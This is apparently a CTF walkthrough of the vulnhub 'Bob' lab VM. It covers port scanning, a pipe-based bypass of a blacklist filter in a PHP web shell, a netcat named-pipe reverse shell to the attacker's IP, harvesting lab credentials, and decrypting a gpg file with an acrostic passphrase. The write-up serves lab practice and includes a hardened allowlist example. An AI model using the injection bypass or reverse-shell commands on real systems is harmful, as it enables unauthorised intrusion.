The full-range port scan using nmap discloses three services running with remotely accessible ports:
-> an ftp server running the ProFTPD version 1.3.5b daemon
-> an Apache web server running on port 80
-> an ssh daemon running on the uncommon port 25468:
# nmap -O -sT -sV -p- -T5 192.168.75.130
The ftp server doesn't allow anonymous access and there's a robots.txt file on the target server, so my initial summary looked something like this:
Of course, it may seem like a mess to someone else reading it, but overall I started enumerating each linked page on the target as well as the pages listed in the robots.txt file. The dev_shell.php file seemed to be of most interest, and even though it seemed to contain some kind of filter, the simplest way I found to execute a command was to pipe echo along with the command:
echo|cat /etc/passwd
http://192.168.75.130/dev_shell.php
Running dirb with the -X .bak option would additionally disclose that there are some .bak files on the server containing the sources of the PHP files, which I found easier to do by listing the web server directory contents from the dev_shell.php web shell; the source shows exactly what kind of filter is used. Also note that the web server front page menu has a z-index of -11, which makes the links inaccessible directly, so I just changed it to a positive 11 to be able to navigate through the browser.
The source code of dev_shell.php.bak:
<?php
//init
$invalid = 0;
$command = ($_POST['in_command']);
$bad_words = array("pwd", "ls", "netcat", "ssh", "wget", "ping", "traceroute", "cat", "nc");
?>
...
<?php
system("running command...");
//executes system Command
//checks for sneaky ;
if (strpos($command, ';') !== false) {
    system("echo Nice try skid, but you will never get through this bulletproof php code"); //doesn't work :P
}
else {
    $is_he_a_bad_man = explode(' ', trim($command));
    //checks for dangerous commands (only the first space-separated token is compared)
    if (in_array($is_he_a_bad_man[0], $bad_words)) {
        system("echo Get out skid lol");
    }
    else {
        system($_POST['in_command']);
    }
}
?>
The above script checks for a ';' within the command input; if none is found, it splits the input by spaces and refuses to run the command only when its first word is in the list of restricted commands. However, a piped command gets executed, as the script doesn't check for a "|" passed to its input: with echo|cat /etc/passwd the first space-separated token is echo|cat, which is not in the list, and the whole string is handed to system().
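To make the weakness concrete, here is an added Python model (not code from the walkthrough or from the Bob VM) of the PHP filter logic above, placed beside an allowlist-based check that never hands the input to a shell. BAD_WORDS is copied from the script; ALLOWED is an assumed example allowlist for such an admin shell.

```python
import shlex
import subprocess

# Blacklist copied verbatim from dev_shell.php.bak
BAD_WORDS = {"pwd", "ls", "netcat", "ssh", "wget", "ping", "traceroute", "cat", "nc"}

# Hypothetical allowlist for the hardened variant (assumption, not from the page)
ALLOWED = {"date", "uptime", "whoami"}


def original_filter_blocks(command: str) -> bool:
    """Model of the PHP filter: block only if ';' is present or the FIRST
    space-separated token is blacklisted (strpos / explode(' ') / in_array)."""
    if ";" in command:
        return True
    first_token = command.strip().split(" ")[0]  # explode(' ', trim($command))[0]
    # 'echo|cat /etc/passwd' -> first token 'echo|cat', not in the list -> passes
    return first_token in BAD_WORDS


def hardened_parse(command: str):
    """Allowlist approach: tokenise with shell quoting rules, accept only an
    allowlisted program name, and refuse any shell metacharacter in any token.
    Returns an argv list (to be run without a shell) or None if rejected."""
    try:
        argv = shlex.split(command)
    except ValueError:  # unbalanced quotes
        return None
    if not argv or argv[0] not in ALLOWED:
        return None
    # argv would be passed to the program as literal arguments, not to a shell,
    # but rejecting metacharacters keeps the surface as small as possible
    if any(ch in tok for tok in argv for ch in "|;&$`<>\n"):
        return None
    return argv


def run_hardened(command: str) -> str:
    """Run the validated argv list without a shell; '|' and ';' are never interpreted."""
    argv = hardened_parse(command)
    if argv is None:
        return "rejected"
    return subprocess.run(argv, capture_output=True, text=True, timeout=5).stdout


if __name__ == "__main__":
    for probe in ("cat /etc/passwd", "echo|cat /etc/passwd", "uptime", "whoami | cat"):
        print(f"{probe!r:28} blacklist blocks: {original_filter_blocks(probe)!s:5} "
              f"allowlist argv: {hardened_parse(probe)}")
```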
Phase 2: RCE
To spawn a shell, I used the following commands:
echo|mknod /tmp/backpipe p
echo|/bin/sh 0</tmp/backpipe | /bin/nc 192.168.75.120 443 1>/tmp/backpipe
Getting a shell
The ftp server also seems to be prone to the mod_copy Remote Command Execution (E-DB ID: 36803); however, as the DocumentRoot directory belongs to root, this wouldn't work as an exploitation vector, since there isn't a writable folder on the web server which could be used to store a file and trigger an RCE from there.
Phase 3: Putting together the pieces
From this point it's all about connecting who said what about whom and who stored what (or where) as a password. While browsing through the /home directory, the first thing that caught my attention was the file theadminisdumb.txt:
Password for user jc : Qwerty
Trying to login as elliot : theadminisdumb would not work, however a login to the system using user jc (james) worked out of the box:
User jc
A file named .old_passwordfile.html can be located in user bob’s home directory as well, exposing additional credentials:
Getting credentials for user jc and seb from within bob’s directory
As can be seen from the screenshot, jc has some restrictions placed on his account and is unable to cat files, which can be bypassed by using head, tail or the strings binary. However, Sebastian's account offers a more convenient surface for further enumeration.
Phase 4: Privilege Escalation
The privilege escalation on this box is rather easy, as long as you look for something suspicious and out of the ordinary. I keep seeing most people advise enumerating configuration files and looking for issues (with which of course I agree), but my lesson learned on this box concerned the privilege escalation: there was a file residing on the server which supposedly should have contained something important, so you have to look for the human element. Once you browse through the directory structure in /home you'd notice the following files in the "Documents" folder of user bob:
Bob’s documents
The file command reports login.txt.gpg as "GPG symmetrically encrypted data (AES cipher)".
A gpg-encrypted file named "login" is definitely something that must contain valuable information, so it has to be looked into thoroughly.
Initially I tried cracking the login.txt.gpg passphrase using the tool PGPCrack-NG and the rockyou.txt dictionary and just left it running while doing further enumeration. I didn't even think the passphrase might be stored somewhere in plain text. The tool didn't find anything even though I left it for hours while looking for proftpd and ssh(d) misconfigurations based on the output of sudo -l.
Enumerating the user’s bob folder further shows the following content represented in some text files:
# cat staff.txt
This somehow suggests that the user "bob" is in charge of this server, so getting access with bob's privileges might be worth trying.
Looking at a bash script echoing some commands within the directory discloses the following text:
# cat notes.sh
It doesn't quite make sense and looks like some random notes from someone bored just talking to himself. The word "Cucumber" seems out of place, and I tried it as a possible passphrase on the login.txt.gpg file with no success.
At this point I skipped this file and decided it contained nothing useful, and spent hours trying to look into configuration glitches on the server (as mentioned above).
However, looking carefully at the whole picture, and especially at the suspicious notes.sh file which is kept in a folder named "Secret", reveals that the first letters of the lines actually spell a word:
-= Notes =-
Harry Potter is my faviorite
Are you the real me?
Right, I'm ordering pizza this is going nowhere
People just don't get me
Ohhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh <sea santy here>
Cucumber
Rest now your eyes are sleepy
Are you gonna stop reading this yet?
Time to fix the server
Everyone is annoying
Sticky notes gotta buy em
So the word "HARPOCRATES" (which according to Google was the god of silence, secrets and confidentiality) should be either the password for the account bob or the passphrase required to unlock the file.
Trying it as a direct password on user Bob didn’t work:
Trying to login with bob : HARPOCRATES
However, I succeeded in decrypting the login.txt.gpg file using the passphrase "HARPOCRATES" straight out of the box, directly using the shell on the server:
# gpg --batch --passphrase HARPOCRATES -d login.txt.gpg
bob:b0bcat_
Logging in with user bob : b0bcat_
Privilege Escalation on target Bob – PromiseLabs blog, vulnhub CTF walkthrough
And getting the flag:
Getting the flag on target Bob – vulnhub CTF walkthrough by d7x